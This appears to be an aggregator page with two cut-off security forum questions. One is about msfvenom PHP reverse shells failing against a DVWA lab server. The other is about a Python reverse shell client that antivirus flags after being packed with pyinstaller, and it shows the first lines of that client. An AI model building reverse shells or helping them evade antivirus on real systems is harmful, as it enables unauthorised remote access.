Why are PHP based msfvenom reverse shells for targeting my Windows server (for penetration testing purpose) not working?

I am just getting started with information security and trying to get a taste of it.
I am running Windows 10 in my laptop and have deployed DVWA in it on XAMPP. I am running a virtual machine in the same laptop with OS Kali linux. Before d… Continue reading Why are PHP based msfvenom reverse shells for targeting my Windows server (for penetration testing purpose) not working?

Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file

When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus.
Here is my client file:
import os, socket, subprocess

s = socket.socket()
host = ‘192… Continue reading Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file